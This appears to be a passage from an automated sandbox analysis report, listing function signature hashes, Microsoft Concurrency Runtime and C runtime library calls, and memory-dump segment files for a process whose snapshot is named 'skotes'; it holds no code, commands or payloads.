                                                                                                                • Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_780000_skotes.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Context$Base::Concurrency::details::$EventInternal$AssignBlockingConcurrency::location::_FindNestingPrepareThrowTraceWork
                                                                                                                • String ID:
                                                                                                                • API String ID: 1091748018-0
                                                                                                                • Opcode ID: 7dc4e568f699399dfca8afca311fb17e2e2b5be53ff809ed7c383f111348b16d
                                                                                                                • Instruction ID: 6b94eecce37b68f723548dc90bf205d968d3474a8d2e8fec5a9f6b4f9054b073
                                                                                                                • Opcode Fuzzy Hash: 7dc4e568f699399dfca8afca311fb17e2e2b5be53ff809ed7c383f111348b16d
                                                                                                                • Instruction Fuzzy Hash: 8241E770604214FFCF299B24C88ABBDBB75AF86720F044299E5075B7C2CB78AD45C7A1
                                                                                                                APIs
                                                                                                                • _InternalDeleteHelper.LIBCONCRT ref: 007A56F2
                                                                                                                • _InternalDeleteHelper.LIBCONCRT ref: 007A5726
                                                                                                                • Concurrency::details::SchedulerBase::TraceSchedulerEvent.LIBCMT ref: 007A578B
                                                                                                                • SafeRWList.LIBCONCRT ref: 007A579A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_780000_skotes.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: DeleteHelperInternalScheduler$Base::Concurrency::details::EventListSafeTrace
                                                                                                                • String ID:
                                                                                                                • API String ID: 893951542-0
                                                                                                                • Opcode ID: 40a947a639dd21950f18c36af9fd71db89b039bb5cef41b65d7628ba82d8c2c5
                                                                                                                • Instruction ID: a4a3042846b3592fe09349d061296d7012b3f8750b5ac5f721cc7c0fd9144262
                                                                                                                • Opcode Fuzzy Hash: 40a947a639dd21950f18c36af9fd71db89b039bb5cef41b65d7628ba82d8c2c5
                                                                                                                • Instruction Fuzzy Hash: 4531E736701510DFCF199F60D889BAD77B6AFC9710F148279E90AAF295DB386C058790
                                                                                                                APIs
                                                                                                                • Concurrency::details::ResourceManager::InitializeRMBuffers.LIBCMT ref: 007A2D0F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_780000_skotes.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: BuffersConcurrency::details::InitializeManager::Resource
                                                                                                                • String ID:
                                                                                                                • API String ID: 3433162309-0
                                                                                                                • Opcode ID: 60a62a3a49b282da89ac1dd2897a3c99486ae802d5a0ad6c1b2a4c9788d68423
                                                                                                                • Instruction ID: c6270729528ca1b2ad8c3c4ff163d7234a76102c8b4313f0c517105167486764
                                                                                                                • Opcode Fuzzy Hash: 60a62a3a49b282da89ac1dd2897a3c99486ae802d5a0ad6c1b2a4c9788d68423
                                                                                                                • Instruction Fuzzy Hash: 60313B75A00309EFCF14DF98C5C4BAE7BB9BB85310F1405AAD901AB357D734A946DBA0
                                                                                                                APIs
                                                                                                                • __EH_prolog3_catch.LIBCMT ref: 007B13FC
                                                                                                                • Concurrency::details::_TaskCollectionBase::_GetTokenState.LIBCONCRT ref: 007B1447
                                                                                                                • Concurrency::details::_CancellationTokenState::_RegisterCallback.LIBCONCRT ref: 007B147A
                                                                                                                • Concurrency::details::_StructuredTaskCollection::_CountUp.LIBCMT ref: 007B152A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_780000_skotes.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Concurrency::details::_$TaskToken$Base::_CallbackCancellationCollectionCollection::_CountH_prolog3_catchRegisterStateState::_Structured
                                                                                                                • String ID:
                                                                                                                • API String ID: 2092016602-0
                                                                                                                • Opcode ID: 00c080d4b065ff35a9580724019f447fdd849732457af36b119d36f8504befd5
                                                                                                                • Instruction ID: 534e3dc43108eac10d61667a2a35758e8cf8828156f72feccc181224884dce9d
                                                                                                                • Opcode Fuzzy Hash: 00c080d4b065ff35a9580724019f447fdd849732457af36b119d36f8504befd5
                                                                                                                • Instruction Fuzzy Hash: 90317371A00605DFCF14EFA9C495AEDFBB1BF88710B94822DE516A7381DB38AD41CB90
                                                                                                                APIs
                                                                                                                • __EH_prolog3_catch.LIBCMT ref: 007A9C9C
                                                                                                                • Concurrency::SchedulerPolicy::_ValidPolicyValue.LIBCONCRT ref: 007A9CE8
                                                                                                                • std::bad_exception::bad_exception.LIBCMT ref: 007A9CFE
                                                                                                                • std::bad_exception::bad_exception.LIBCMT ref: 007A9D6A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_780000_skotes.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: std::bad_exception::bad_exception$Concurrency::H_prolog3_catchPolicyPolicy::_SchedulerValidValue
                                                                                                                • String ID:
                                                                                                                • API String ID: 2033596534-0
                                                                                                                • Opcode ID: 3693af03a034423d530b55db05cf65240c9b1349eb46c072c9d980e6dd83b8a9
                                                                                                                • Instruction ID: b82d66ce5e88d9e355e992f5d9b6452bb51038dc514eb14957b6c4bb7a001adb
                                                                                                                • Opcode Fuzzy Hash: 3693af03a034423d530b55db05cf65240c9b1349eb46c072c9d980e6dd83b8a9
                                                                                                                • Instruction Fuzzy Hash: 6C21DA71A04514DFCF04EF64D88ADAEB7F0EF46310B20416AF202AF251DB39AE91CB61
                                                                                                                APIs
                                                                                                                • ListArray.LIBCONCRT ref: 007A4893
                                                                                                                • ListArray.LIBCONCRT ref: 007A48A5
                                                                                                                  • Part of subcall function 007A5555: _InternalDeleteHelper.LIBCONCRT ref: 007A5564
                                                                                                                • ListArray.LIBCONCRT ref: 007A48AF
                                                                                                                • _InternalDeleteHelper.LIBCONCRT ref: 007A48C8
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
